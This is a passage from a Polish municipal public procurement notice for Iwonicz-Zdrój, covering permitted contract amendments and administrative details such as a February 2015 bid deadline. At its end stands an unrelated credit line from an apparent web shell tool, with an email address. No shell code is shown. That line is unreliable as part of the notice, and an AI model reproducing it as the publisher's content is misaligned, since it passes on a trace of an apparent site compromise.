<p>16.2.	Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, chyba że zmiana będzie dotyczyła następujących zdarzeń: 
1) Wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy. 
2) Wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony. 
3) Wystąpienia konieczności zmiany osób wskazanych w ofercie (śmierć, choroba, ustania stosunku pracy lub inne zdarzenia losowe lub inne przyczyny niezależne od wykonawcy), przy pomocy których wykonawca realizuje przedmiot umowy. Przedmiotowa zmiana jest możliwa pod warunkiem zaproponowania innych osób, spełniających na dzień składania ofert, warunki określone przez zamawiającego w specyfikacji. 
4) Zmiany podwykonawcy, który - zgodnie z art. 26 ust. 2b prawa zamówień publicznych - będzie podmiotem udostępniającym zasoby niezbędne do realizacji zamówienia. W takim przypadku Wykonawca jest zobowiązany zaproponować innego podwykonawcę spełniającego na dzień składania ofert warunki określone przez zamawiającego w specyfikacji wraz z załączeniem wszystkich wymaganych oświadczeń i dokumentów określonych w specyfikacji istotnych warunków zamówienia. 
5) Wystąpienia konieczności zmian osób wykonawcy, w przypadku gdy zamawiający uzna, że osoby te nie wykonują należycie swoich obowiązków. Wykonawca obowiązany jest dokonać zmiany tych osób na inne spełniające na dzień składania ofert warunki określone w specyfikacji w terminie nie dłuższym niż 14 dni od daty złożenia wniosku zamawiającego. 
6) Zmiana terminu realizacji przedmiotu umowy z przyczyn niezależnych od wykonawcy, a także z przyczyn określonych w § 4 ust. 3 projektu umowy oraz, np. przedłużającej się procedury przetargowej, wystąpienia zwłoki w wydaniu przez organy administracji lub inne podmioty wymaganych decyzji, zezwoleń. 
7) W przypadku wystąpienia któregokolwiek ze zdarzeń wymienionych w pkt od 1 do 6 termin realizacji przedmiotu umowy może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności. 
8) Pozostałe zmiany zostały określone w treści  umowy stanowiącej załącznik nr 8 do siwz. 
9) Wszelkie zmiany które w istotny sposób zmienią treść umowy wymagają pisemnego aneksu podpisanego przez strony.
10)	Wszystkie powyższe postanowienia wymienione w niniejszym ustępie stanowią katalog  zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.iwonicz-zdroj.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urzad Gminy w Iwoniczu-Zdroju
Al. Słoneczna 28
38-440 Iwonicz-Zdrój.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.02.2015 godzina 11:30, miejsce: Urzad Gminy w Iwoniczu-Zdroju
Al. Słoneczna 28
38-440 Iwonicz-Zdrój
Biuro Obsługi Mieszkańca (BOM) - parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com